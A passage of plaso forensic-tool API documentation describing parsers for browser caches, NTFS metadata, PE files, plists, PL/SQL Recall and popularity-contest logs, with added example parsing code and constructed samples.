class plaso.parsers.msiecf.MSIECFParser
Bases: plaso.parsers.interface.FileObjectParser
Parses MSIE Cache Files (MSIECF).
DATA_FORMAT = 'Microsoft Internet Explorer (MSIE) 4 - 9 cache (index.dat) file'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NAME = 'msiecf'
ParseFileObject(parser_mediator, file_object)
Parses a MSIE Cache File (MSIECF) file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
class plaso.parsers.msiecf.MSIECFRedirectedEventData
Bases: plaso.containers.events.EventData
MSIECF redirected event data.
recovered: True if the item was recovered.
Type bool
url: location URL.
Type str
DATA_TYPE = 'msiecf:redirected'
class plaso.parsers.msiecf.MSIECFURLEventData
Bases: plaso.containers.events.EventData
MSIECF URL event data.
cached_filename: name of the cached file.
Type str
cached_file_size: size of the cached file.
Type int
cache_directory_index: index of the cache directory.
Type int
cache_directory_name: name of the cache directory.
Type str
http_headers: HTTP headers.
Type str
number_of_hits: number of hits.
Type int
recovered: True if the item was recovered.
Type bool
url: location URL.
Type str
DATA_TYPE = 'msiecf:url'
plaso.parsers.networkminer module
Parser for NetworkMiner .fileinfos files.
class plaso.parsers.networkminer.NetworkMinerEventData
Bases: plaso.containers.events.EventData
NetworkMiner event data.
destination_ip: destination IP address.
Type str
destination_port: destination port number.
Type str
file_details: details about the file.
Type str
file_md5: MD5 hash of the file.
Type str
file_path: file path to where it was downloaded.
Type str
file_size: size of the file.
Type str
filename: name of the file.
Type str
source_ip: originating IP address.
Type str
source_port: originating port number.
Type str
DATA_TYPE = 'networkminer:fileinfos:file'
class plaso.parsers.networkminer.NetworkMinerParser(encoding=None)
Bases: plaso.parsers.dsv_parser.DSVParser
Parser for NetworkMiner .fileinfos files.
COLUMNS = ('source_ip', 'source_port', 'destination_ip', 'destination_port', 'filename', 'file_path', 'file_size', 'unused', 'file_md5', 'unused2', 'file_details', 'unused4', 'timestamp')
DATA_FORMAT = 'NetworkMiner .fileinfos file'
MIN_COLUMNS = 13
NAME = 'networkminer_fileinfo'
ParseRow(parser_mediator, row_offset, row)
Parses a line of the log file and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• row_offset (int) – line number of the row.
• row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
VerifyRow(parser_mediator, row)
Verifies if a line of the file is in the expected format.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
Returns True if this is the correct parser, False otherwise.
Return type bool
plaso.parsers.ntfs module
Parser for NTFS metadata files.
class plaso.parsers.ntfs.NTFSFileStatEventData
Bases: plaso.containers.events.EventData
NTFS file system stat event data.
attribute_type: attribute type, for example 0x00000030, which represents $FILE_NAME.
Type int
display_name: display name.
Type str
file_attribute_flags: NTFS file attribute flags.
Type int
file_reference: NTFS file reference.
Type int
file_system_type: file system type.
Type str
filename: name of the file.
Type str
is_allocated: True if the MFT entry is allocated (marked as in use).
Type bool
name: name associated with the stat event, for example that of a $FILE_NAME attribute, or None if not available.
Type str
parent_file_reference: NTFS file reference of the parent.
Type int
path_hints: hints about the full path of the file.
Type list[str]
DATA_TYPE = 'fs:stat:ntfs'
class plaso.parsers.ntfs.NTFSMFTParser
Bases: plaso.parsers.interface.FileObjectParser
Parses a NTFS $MFT metadata file.
DATA_FORMAT = 'NTFS $MFT metadata file'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NAME = 'mft'
ParseFileObject(parser_mediator, file_object)
Parses a NTFS $MFT metadata file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
class plaso.parsers.ntfs.NTFSUSNChangeEventData
Bases: plaso.containers.events.EventData
NTFS USN change event data.
file_attribute_flags: NTFS file attribute flags.
Type int
filename: name of the file associated with the event.
Type str
file_reference: NTFS file reference.
Type int
file_system_type: file system type.
Type str
parent_file_reference: NTFS file reference of the parent.
Type int
update_reason_flags: update reason flags.
Type int
update_sequence_number: update sequence number.
Type int
update_source_flags: update source flags.
Type int
DATA_TYPE = 'fs:ntfs:usn_change'
class plaso.parsers.ntfs.NTFSUsnJrnlParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parses a NTFS USN change journal.
DATA_FORMAT = 'NTFS USN change journal ($UsnJrnl:$J) file system metadata file'
NAME = 'usnjrnl'
ParseFileObject(parser_mediator, file_object)
Parses a NTFS $UsnJrnl metadata file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
plaso.parsers.olecf module
Parser for OLE Compound Files (OLECF).
class plaso.parsers.olecf.OLECFParser
Bases: plaso.parsers.interface.FileObjectParser
Parses OLE Compound Files (OLECF).
DATA_FILE = 'OLE Compound file (OLECF)'
(Note: in this release the format description attribute of this parser is named DATA_FILE, unlike the DATA_FORMAT attribute every other parser in this package uses.)
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NAME = 'olecf'
ParseFileObject(parser_mediator, file_object)
Parses an OLE Compound File (OLECF) file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
plaso.parsers.opera module
Parsers for Opera Browser history files.
class plaso.parsers.opera.OperaGlobalHistoryEventData
Bases: plaso.containers.events.EventData
Opera global history entry data.
description: description.
Type str
popularity_index: popularity index.
Type int
title: title.
Type str
url: URL.
Type str
DATA_TYPE = 'opera:history:entry'
class plaso.parsers.opera.OperaGlobalHistoryParser
Bases: plaso.parsers.interface.FileObjectParser
Parses the Opera global_history.dat file.
DATA_FORMAT = 'Opera global history (global_history.dat) file'
NAME = 'opera_global'
ParseFileObject(parser_mediator, file_object)
Parses an Opera global history file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
class plaso.parsers.opera.OperaTypedHistoryEventData
Bases: plaso.containers.events.EventData
Opera typed history entry data.
entry_selection: information about whether the URL was directly typed in or the result of the user choosing from the autocomplete.
Type str
entry_type: information about whether the URL was directly typed in or the result of the user choosing from the autocomplete.
Type str
url: typed URL or hostname.
Type str
DATA_TYPE = 'opera:history:typed_entry'
class plaso.parsers.opera.OperaTypedHistoryParser
Bases: plaso.parsers.interface.FileObjectParser
Parses the Opera typed_history.xml file.
DATA_FORMAT = 'Opera typed history (typed_history.xml) file'
NAME = 'opera_typed_history'
ParseFileObject(parser_mediator, file_object)
Parses an Opera typed history file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.pe module
A parser for Portable Executable format files.
class plaso.parsers.pe.PEEventData
Bases: plaso.containers.events.EventData
Portable Executable (PE) event data.
dll_name: name of an imported DLL.
Type str
imphash: “Import Hash” of the PE file the event relates to. Also see: https://www.mandiant.com/blog/tracking-malware-import-hashing
Type str
pe_type: type of PE file the event relates to.
Type str
section_names: names of the PE file’s sections.
Type list[str]
DATA_TYPE = 'pe'
class plaso.parsers.pe.PEParser
Bases: plaso.parsers.interface.FileObjectParser
Parser for Portable Executable (PE) files.
DATA_FORMAT = 'Portable Executable (PE) file'
classmethod GetFormatSpecification()
Retrieves the format specification.
NAME = 'pe'
ParseFileObject(parser_mediator, file_object)
Parses a Portable Executable (PE) file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
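The imphash attribute is worth computing by hand once to see what it does and does not tell you: it is an MD5 over the normalised import table, so it groups samples built from the same source with the same imports, and it changes the moment one import is added, removed or reordered. The following added example (not plaso's code, which takes the value from the pefile library) implements the normalisation and hash for named imports as the Mandiant article linked above describes it. The import table is constructed, and imports by ordinal are left out; the full scheme maps known ordinals to names before hashing.

```python
import hashlib

# Constructed import table: (DLL name as written in the import directory,
# imported symbol name), in table order. Made up for this example.
SAMPLE_IMPORTS = [
    ('KERNEL32.DLL', 'CreateFileW'),
    ('KERNEL32.dll', 'WriteFile'),
    ('ADVAPI32.dll', 'RegSetValueExW'),
    ('WS2_32.dll', 'WSAStartup'),
]

# Module extensions the scheme strips before hashing.
_STRIPPED_EXTENSIONS = ('.dll', '.ocx', '.sys')


def normalize_import(dll_name, symbol_name):
    """One import as it enters the hash: lower-cased module name without its
    extension, a dot, then the lower-cased symbol name."""
    module = dll_name.lower()
    for extension in _STRIPPED_EXTENSIONS:
        if module.endswith(extension):
            module = module[:-len(extension)]
            break
    return '{0:s}.{1:s}'.format(module, symbol_name.lower())


def canonical_string(imports):
    """The comma-joined, order-preserving string that gets hashed. Order matters:
    the same imports in a different order produce a different imphash."""
    return ','.join(normalize_import(dll, symbol) for dll, symbol in imports)


def imphash(imports):
    """Import hash: MD5 of the canonical string. Imports by ordinal are not
    handled here (the full scheme resolves known ordinals to names first)."""
    return hashlib.md5(canonical_string(imports).encode('utf-8')).hexdigest()
```

Because the hash is taken over names only, it says nothing about the code that uses them: a packed or hand-crafted binary with a minimal import table will collide with every other such binary, so a matching imphash is a lead for clustering, not proof of a shared build.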
plaso.parsers.plist module
Parser for binary and text Property List (plist) files.
class plaso.parsers.plist.PlistParser
Bases: plaso.parsers.interface.FileObjectParser
Parser for binary and text Property List (plist) files.
The Plaso engine calls parsers by their Parse() method. This parser’s Parse() has GetTopLevel(), which deserializes plist files using the plistlib library, and calls plugins (PlistPlugin) registered through the interface by their Process() method to produce event objects.
Plugins are how this parser understands the content inside a plist file; each plugin holds logic specific to a particular plist file. See the interface and the plist_plugins/ directory for examples of how plist plugins are implemented.
DATA_FORMAT = 'Property list (plist) file'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns a format specification or None if not available.
Return type FormatSpecification
GetTopLevel(file_object)
Returns the deserialized content of a plist as a dictionary object.
Parameters file_object (dfvfs.FileIO) – a file-like object to parse.
Returns contents of the plist.
Return type dict[str, object]
Raises UnableToParseFile – when the file cannot be parsed.
NAME = 'plist'
ParseFileObject(parser_mediator, file_object)
Parses a plist file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.pls_recall module
Parser for PL/SQL Developer Recall files.
class plaso.parsers.pls_recall.PlsRecallEventData
Bases: plaso.containers.events.EventData
PL/SQL Recall event data.
database_name: name of the database.
Type str
query: PL/SQL query.
Type str
sequence_number: sequence number.
Type int
username: username used to query.
Type str
DATA_TYPE = 'PLSRecall:event'
class plaso.parsers.pls_recall.PlsRecallParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parses PL/SQL Recall files.
This parser is based on the Delphi definition of the data type:
    TRecallRecord = packed record
      Sequence: Integer;
      TimeStamp: TDateTime;
      Username: array[0..30] of Char;
      Database: array[0..80] of Char;
      Text: array[0..4000] of Char;
    end;
Delphi TDateTime is a little-endian 64-bit floating-point value without time zone information.
DATA_FORMATE = 'PL SQL cache file (PL-SQL developer recall file)'
(Note: in this release the attribute is spelled DATA_FORMATE, unlike the DATA_FORMAT attribute every other parser in this package uses.)
NAME = 'pls_recall'
ParseFileObject(parser_mediator, file_object)
Parses a PLSRecall.dat file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
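The Delphi record above fixes the byte layout completely, so the parser is a fixed-size struct walk plus a TDateTime conversion. The following added example (not plaso's code, which describes the layout to dtfabric instead) does that walk with the struct module: a packed little-endian int32, a float64 and three NUL-padded char arrays, 4125 bytes per record. It assumes records start at offset 0 with no file header and that the char arrays are in the Windows cp1252 code page; build_record exists only to construct the sample file, whose statements, user and database name are made up.

```python
import struct
from datetime import datetime, timedelta

# Byte layout of the packed Delphi TRecallRecord: little-endian int32, float64,
# then three NUL-padded char arrays of 31, 81 and 4001 bytes (4125 in total).
RECORD_STRUCT = struct.Struct('<id31s81s4001s')
# TDateTime day 0 is 1899-12-30; the fraction is the time of day, no time zone.
DELPHI_EPOCH = datetime(1899, 12, 30)


def tdatetime_to_datetime(value):
    """Convert a Delphi TDateTime double to a naive datetime."""
    return DELPHI_EPOCH + timedelta(days=value)


def _char_array(raw):
    """Fixed-size char array: the text runs to the first NUL, the rest is
    padding. cp1252 is an assumption (PL/SQL Developer runs on Windows)."""
    return raw.split(b'\x00', 1)[0].decode('cp1252', errors='replace')


def parse_record(data, offset=0):
    """Unpack one record starting at 'offset' into the event data attributes."""
    sequence, timestamp, username, database, text = RECORD_STRUCT.unpack_from(data, offset)
    return {
        'sequence_number': sequence,
        'timestamp': tdatetime_to_datetime(timestamp),
        'username': _char_array(username),
        'database_name': _char_array(database),
        'query': _char_array(text),
    }


def parse_file(data):
    """Walk consecutive records from offset 0 (no file header is assumed);
    a trailing partial record is ignored rather than mis-parsed."""
    return [parse_record(data, offset)
            for offset in range(0, len(data) - RECORD_STRUCT.size + 1, RECORD_STRUCT.size)]


def build_record(sequence, timestamp, username, database, text):
    """Pack a record the way the Delphi program would; used here only to
    construct the sample file."""
    days = (timestamp - DELPHI_EPOCH) / timedelta(days=1)
    return RECORD_STRUCT.pack(sequence, days, username.encode('cp1252'),
                              database.encode('cp1252'), text.encode('cp1252'))


# Constructed sample: two recalled statements, all values made up.
SAMPLE_FILE = (
    build_record(1, datetime(2020, 10, 7, 12, 0, 0), 'scott', 'ORCL',
                 "select * from dba_users where username = 'SYS'")
    + build_record(2, datetime(2020, 10, 7, 18, 0, 0), 'scott', 'ORCL',
                   'grant dba to scott'))
```

The recall file is a query history, so the interesting part for an investigation is the query text: a DBA tool's cache on an analyst's workstation can hold privilege grants and data pulls that never appear in the database's own audit trail.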
plaso.parsers.plugins module
This file contains the basic interface for plugins within Plaso.
This library serves as a basis for all plugins in Plaso, whether they are Windows Registry plugins, SQLite plugins or any other parsing plugins.
This is provided as a separate file to make it easier to inherit in other projects that may want to use the Plaso plugin system.
class plaso.parsers.plugins.BasePlugin
Bases: object
A plugin is a lightweight parser that makes use of a common data structure.
When a data structure is common among several artifacts or files, a plugin infrastructure can be written to make writing parsers simpler. The goal of a plugin is to have only a single parser that understands the data structure, which can call plugins that have specialized knowledge of certain structures.
An example of this is a SQLite database. A plugin can be written that has knowledge of certain database, suchas Chrome history, or Skype history, etc. This can be done without needing to write a full fledged parser thatneeds to re-implement the data structure knowledge. A single parser can be created that calls the plugins to seeif it knows that particular database.
Another example is Windows registry, there a single parser that can parse the registry can be made and the jobof a single plugin is to parse a particular registry key. The parser can then read a registry key and compare it toa list of available plugins to see if it can be parsed.
DATA_FORMAT = ''
NAME = 'base_plugin'
Process(parser_mediator, **kwargs)Evaluates if this is the correct plugin and processes data accordingly.
The purpose of the process function is to evaluate if this particular plugin is the correct one for the particulardata structure at hand. This function accepts one value to use for evaluation, that could be a registry key,list of table names for a database or any other criteria that can be used to evaluate if the plugin should berun or not.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• kwargs (dict[str, object]) – depending on the plugin they may require different sets of arguments to be able to evaluate whether or not this is the correct plugin.
Raises ValueError – when there are unused keyword arguments.
URLS = []
UpdateChainAndProcess(parser_mediator, **kwargs)
Wrapper for Process() to synchronize the parser chain.
This convenience method updates the parser chain object held by the mediator, transfers control to the plugin-specific Process() method, and updates the chain again once the processing is complete. It provides a simpler parser API in most cases.
Parameters parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
property plugin_name
Return the name of the plugin.
class plaso.parsers.plugins.BasePluginCache
Bases: object
A generic cache for parser plugins.
GetResults(attribute, default_value=None)
Retrieves a cached attribute.
Parameters
• attribute (str) – name of the cached attribute.
• default_value (Optional[object]) – default value.
Returns
value of the cached attribute or default value if the cache does not contain the attribute.
Return type object
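The parser-and-plugin split described above, as an added example that is not plaso's own code: one parser keeps the container knowledge (here a SQLite-style database represented as a dict of table names to rows) and asks each plugin, by the tables it declares, whether the database is one it understands. FakeMediator, SQLitePlugin, the two sample plugins and the dict-shaped database are assumptions of this example; only the shape of Process() and UpdateChainAndProcess() follows the BasePlugin interface documented above.

```python
"""Model of plaso's parser/plugin split (added example, not plaso's own code).

FakeMediator, SQLitePlugin and the two sample plugins are assumptions of this
example; the shape of Process() and UpdateChainAndProcess() follows the
BasePlugin interface documented above.
"""


class FakeMediator:
  """Stand-in for ParserMediator: collects events and tracks the parser chain."""

  def __init__(self):
    self.events = []
    self.parser_chain = []

  def ProduceEvent(self, event):
    self.events.append(event)


class BasePlugin:
  """Simplified counterpart of plaso.parsers.plugins.BasePlugin."""

  NAME = 'base_plugin'

  def Process(self, parser_mediator, **kwargs):
    # Unused keyword arguments mean the parser passed data this plugin does
    # not understand; fail loudly rather than silently ignore them.
    if kwargs:
      raise ValueError('Unused keyword arguments: {0!s}'.format(sorted(kwargs)))

  def UpdateChainAndProcess(self, parser_mediator, **kwargs):
    # Push this plugin onto the chain so produced events can be attributed
    # to it, run Process(), then restore the chain even if Process() raises.
    parser_mediator.parser_chain.append(self.NAME)
    try:
      self.Process(parser_mediator, **kwargs)
    finally:
      parser_mediator.parser_chain.pop()


class SQLitePlugin(BasePlugin):
  """A plugin names the tables it needs; the parser checks them before calling."""

  REQUIRED_TABLES = frozenset()

  def Process(self, parser_mediator, database=None, **kwargs):
    super().Process(parser_mediator, **kwargs)  # rejects leftover kwargs
    self.ParseDatabase(parser_mediator, database)

  def ParseDatabase(self, parser_mediator, database):
    raise NotImplementedError


class ChromeHistoryPlugin(SQLitePlugin):
  NAME = 'chrome_history'
  REQUIRED_TABLES = frozenset({'urls', 'visits'})

  def ParseDatabase(self, parser_mediator, database):
    for row in database['visits']:
      parser_mediator.ProduceEvent(('chrome:visit', row['url'], row['visit_time']))


class SkypePlugin(SQLitePlugin):
  NAME = 'skype'
  REQUIRED_TABLES = frozenset({'Messages'})

  def ParseDatabase(self, parser_mediator, database):
    for row in database['Messages']:
      parser_mediator.ProduceEvent(('skype:message', row['author'], row['timestamp']))


class SQLiteParser:
  """The single parser: reads the table names once, then asks each plugin."""

  def __init__(self, plugins):
    self._plugins = list(plugins)

  def Parse(self, parser_mediator, database):
    table_names = set(database)
    used = []
    for plugin in self._plugins:
      if not plugin.REQUIRED_TABLES.issubset(table_names):
        continue  # this plugin has no knowledge of this database
      plugin.UpdateChainAndProcess(parser_mediator, database=database)
      used.append(plugin.NAME)
    return used


def rejects_unknown_kwargs():
  """True if a plugin refuses keyword arguments it does not understand."""
  try:
    ChromeHistoryPlugin().Process(
        FakeMediator(), database={'urls': [], 'visits': []}, bogus=1)
  except ValueError:
    return True
  return False


def run_demo():
  # Constructed sample: a Chrome-like history database as a dict of rows.
  chrome_db = {
      'urls': [{'id': 1, 'url': 'https://example.org/'}],
      'visits': [{'url': 'https://example.org/', 'visit_time': 13200000000000000}]}
  mediator = FakeMediator()
  used = SQLiteParser([ChromeHistoryPlugin(), SkypePlugin()]).Parse(mediator, chrome_db)
  return used, mediator.events, mediator.parser_chain


if __name__ == '__main__':
  print(run_demo())
```

The check on required tables is what keeps the parser cheap: the table names are read once, and a plugin never sees a database it did not ask for. The `finally` in UpdateChainAndProcess matters for attribution; a plugin that raises must not leave its name on the chain for events produced by the next one.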
plaso.parsers.popcontest module
This file contains the Popularity Contest log file parser in plaso.
Information updated 20 January 2014. From Debian Package Popularity Contest Avery Pennarun <[email protected]>
From ‘http://www.unix.com/man-page/Linux/8/popularity-contest/’:
The popularity-contest command gathers information about Debian packages installed on the system, and prints the name of the most recently used executable program in that package as well as its last-accessed time (atime) and last-attribute-changed time (ctime) to stdout.
When aggregated with the output of popularity-contest from many other systems, this information is valuable because it can be used to determine which Debian packages are commonly installed, used, or installed and never used. This helps Debian maintainers make decisions such as which packages should be installed by default on new systems.
The resulting statistic is available from the project home page http://popcon.debian.org/.
Normally, popularity-contest is run from a cron(8) job, /etc/cron.daily/popularity-contest, which automatically submits the results to Debian package maintainers (only once a week) according to the settings in /etc/popularity-contest.conf and /usr/share/popularity-contest/default.conf.
From ‘http://popcon.ubuntu.com/README’:
The popularity-contest output looks like this:
POPULARITY-CONTEST-0 TIME:914183330 ID:b92a5fc1809d8a95a12eb3a3c8445914
914183333 909868335 grep /bin/fgrep
914183333 909868280 findutils /usr/bin/find
914183330 909885698 dpkg-awk /usr/bin/dpkg-awk
914183330 909868577 gawk /usr/bin/gawk
[...more lines...]
END-POPULARITY-CONTEST-0 TIME:914183335
The first and last lines allow you to put more than one set of popularity-contest results into a single file and then split them up easily later.
The rest of the lines are package entries, one line for each package installed on your system. They have the format:
<atime> <ctime> <package-name> <mru-program> <tag>
<package-name> is the name of the Debian package that contains <mru-program>. <mru-program> is the most recently used program, static library, or header (.h) file in the package.
<atime> and <ctime> are the access time and creation time of the <mru-program> on your disk, respectively, represented as the number of seconds since midnight GMT on January 1, 1970 (i.e. in Unix time_t format). Linux updates <atime> whenever you open the file; <ctime> was set when you first installed the package.
<tag> is determined by popularity-contest depending on <atime>, <ctime>, and the current date. <tag> can be RECENT-CTIME, OLD, or NOFILES.
RECENT-CTIME means that atime is very close to ctime; it’s impossible to tell whether the package was used recently or not, since <atime> is also updated when <ctime> is set. Normally, this happens because you have recently upgraded the package to a new version, resetting the <ctime>.
OLD means that the <atime> is more than a month ago; you haven’t used the package for more than a month.
NOFILES means that no files in the package seemed to be programs, so <atime>, <ctime>, and <mru-program> are invalid.
REMARKS. The parser generates events solely from the <atime> field and not from <ctime>, to avoid generating (possibly many) useless events that all share the same <ctime>. That <ctime> can most likely be obtained from file system and/or package management logs instead. The <ctime> is still reported in the log line.
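The format described above, parsed end to end as an added example (this is not plaso's PopularityContestParser): header and footer lines become session start/end events, each package record becomes one event dated by <atime> only, as the REMARKS prescribe, and NOFILES-style records, whose <atime> is invalid, produce no event. The sample log is constructed from the README example above; the ARCH/POPCONVER details after the ID are an assumption of this example.

```python
"""Parser for popularity-contest output (added example, not plaso's own code).

Implements the format described above: a POPULARITY-CONTEST-N header, one
"<atime> <ctime> <package-name> <mru-program> <tag>" record per package and an
END-POPULARITY-CONTEST-N footer.  Events are produced from <atime> only;
<ctime> is kept in the event but never used as a timestamp.
"""
import re
from datetime import datetime, timezone

HEADER_RE = re.compile(r'^POPULARITY-CONTEST-(\d+) TIME:(\d+) ID:([0-9a-fA-F]+)(.*)$')
FOOTER_RE = re.compile(r'^END-POPULARITY-CONTEST-(\d+) TIME:(\d+)$')
KNOWN_TAGS = frozenset({'RECENT-CTIME', 'OLD', 'NOFILES'})


def parse_record(line):
  """Splits one package record; returns None if the line is not a record.

  Accepted shapes (mirroring the grammar on this page):
    <atime> <ctime> <package> <mru-program> [<TAG>]
    <atime> <ctime> <package> <TAG>            (NOFILES-style, no program)
  """
  parts = line.split()
  if len(parts) < 3 or not (parts[0].isdigit() and parts[1].isdigit()):
    return None
  tag = None
  if parts[-1].startswith('<') and parts[-1].endswith('>'):
    tag = parts[-1][1:-1]
    parts = parts[:-1]
  if len(parts) == 4:
    mru = parts[3]
  elif len(parts) == 3 and tag is not None:
    mru = None
  else:
    return None
  return {
      'atime': int(parts[0]), 'ctime': int(parts[1]),
      'package': parts[2], 'mru': mru, 'record_tag': tag,
      'unknown_tag': tag is not None and tag not in KNOWN_TAGS}


def _session_event(session, time_field, status, hostid=None, details=None):
  return {
      'data_type': 'popularity_contest:session:event',
      'timestamp': datetime.fromtimestamp(int(time_field), tz=timezone.utc),
      'session': session, 'status': status,
      'hostid': hostid, 'details': details}


def parse_popcon(text):
  """Returns a list of event dicts; raises ValueError on a malformed line."""
  events = []
  for lineno, raw in enumerate(text.splitlines(), 1):
    line = raw.strip()
    if not line:
      continue
    match = HEADER_RE.match(line)
    if match:
      events.append(_session_event(
          int(match.group(1)), match.group(2), 'start',
          hostid=match.group(3), details=match.group(4).strip()))
      continue
    match = FOOTER_RE.match(line)
    if match:
      events.append(_session_event(int(match.group(1)), match.group(2), 'end'))
      continue
    record = parse_record(line)
    if record is None:
      raise ValueError('line {0:d} is not a popularity-contest record: {1:s}'.format(
          lineno, line))
    # NOFILES records carry no program and an invalid <atime>: nothing to date.
    if record['mru'] is None or record['atime'] == 0:
      continue
    events.append({
        'data_type': 'popularity_contest:log:event',
        'timestamp': datetime.fromtimestamp(record['atime'], tz=timezone.utc),
        'ctime': record['ctime'], 'package': record['package'],
        'mru': record['mru'], 'record_tag': record['record_tag']})
  return events


# Constructed sample: the README example above plus tagged records; the
# ARCH/POPCONVER details after the ID are an assumption of this example.
SAMPLE_LOG = """\
POPULARITY-CONTEST-0 TIME:914183330 ID:b92a5fc1809d8a95a12eb3a3c8445914 ARCH:amd64 POPCONVER:1.64
914183333 909868335 grep /bin/fgrep
914183333 909868280 findutils /usr/bin/find
914183330 909885698 dpkg-awk /usr/bin/dpkg-awk <RECENT-CTIME>
911000000 909868577 gawk /usr/bin/gawk <OLD>
0 0 libexample-dev <NOFILES>
END-POPULARITY-CONTEST-0 TIME:914183335
"""

if __name__ == '__main__':
  for event in parse_popcon(SAMPLE_LOG):
    print(event['timestamp'].isoformat(), event['data_type'],
          event.get('package') or event.get('status'))
```

When reading such events in a timeline, keep the RECENT-CTIME tag in view: for those records the <atime> says nothing about actual use, because a package upgrade reset it together with <ctime>.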
class plaso.parsers.popcontest.PopularityContestEventData
Bases: plaso.containers.events.EventData
Popularity Contest event data.
mru
recently used app/library from package.
Type str
package
installed package name, which the mru belongs to.
Type str
record_tag
popularity contest tag.
Type str
DATA_TYPE = 'popularity_contest:log:event'
class plaso.parsers.popcontest.PopularityContestParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parse popularity contest log files.
DATA_FORMAT = 'Popularity Contest log file'
FOOTER = {{{Suppress:("END-POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)}
HEADER = {{{{{{Suppress:("POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)} Suppress:("ID:")} W:(ABCD...)} SkipTo:(LineEnd)}
LINE_STRUCTURES = [('logline', {{W:(0123...) W:(0123...)} {{W:(0123...) quoted string, starting with < ending with >} | {{W:(0123...) W:(...)} [quoted string, starting with < ending with >]}}}), ('header', {{{{{{Suppress:("POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)} Suppress:("ID:")} W:(ABCD...)} SkipTo:(LineEnd)}), ('footer', {{{Suppress:("END-POPULARITY-CONTEST-") W:(0123...)} Suppress:("TIME:")} W:(0123...)})]
LOG_LINE = {{W:(0123...) W:(0123...)} {{W:(0123...) quoted string, starting with < ending with >} | {{W:(0123...) W:(...)} [quoted string, starting with < ending with >]}}}
MRU = W:(...)
NAME = 'popularity_contest'
PACKAGE = W:(0123...)
ParseRecord(parser_mediator, key, structure)
Parses a log record structure and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• structure (pyparsing.ParseResults) – structure parsed from the log file.
Raises ParseError – when the structure type is unknown.
TAG = quoted string, starting with < ending with >
VerifyStructure(parser_mediator, line)
Verify that this file is a Popularity Contest log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• line (str) – line from a text file.
Returns True if the line was successfully parsed.
Return type bool
class plaso.parsers.popcontest.PopularityContestSessionEventData
Bases: plaso.containers.events.EventData
Popularity Contest session event data.
details
version and host architecture.
Type str
hostid
host uuid.
Type str
session
session number.
Type int
status
session status, either “start” or “end”.
Type str
DATA_TYPE = 'popularity_contest:session:event'
plaso.parsers.presets module
The parser and parser plugin presets.
class plaso.parsers.presets.ParserPreset(name, parsers)
Bases: object
Parser and parser plugin preset.
name
name of the preset.
Type str
operating_systems
operating system artifact attribute containers, that specify to which operating systems the preset applies.
Type list[OperatingSystemArtifact]
parsers
names of parser and parser plugins.
Type list[str]
class plaso.parsers.presets.ParserPresetsManager
Bases: object
The parsers and plugin presets manager.
GetNames()
Retrieves the preset names.
Returns preset names in alphabetical order.
Return type list[str]
GetParsersByPreset(preset_name)
Retrieves the parser and plugin names of a specific preset.
Parameters preset_name (str) – name of the preset.
Returns parser and plugin names in alphabetical order.
Return type list[str]
Raises KeyError – if the preset does not exist.
GetPresetByName(name)
Retrieves a specific preset definition by name.
Parameters name (str) – name of the preset.
Returns a parser preset or None if not available.
Return type ParserPreset
GetPresetsByOperatingSystem(operating_system)
Retrieves preset definitions for a specific operating system.
Parameters operating_system (OperatingSystemArtifact) – an operating system artifact attribute container.
Returns
preset definitions that correspond with the operating system.
Return type list[PresetDefinition]
GetPresetsInformation()
Retrieves the presets information.
Returns
tuples containing:
str: preset name.
str: comma separated parser and plugin names that are defined by the preset.
Return type list[tuple]
ReadFromFile(path)
Reads parser and parser plugin presets from a file.
Parameters path (str) – path of the file that contains the parser and parser plugin presets configuration.
Raises MalformedPresetError – if one or more plugin preset definitions are malformed.
plaso.parsers.recycler module
Parser for Windows Recycle files, INFO2 and $I/$R pairs.
class plaso.parsers.recycler.WinRecycleBinEventData
Bases: plaso.containers.events.EventData
Windows Recycle Bin event data.
drive_number
drive number.
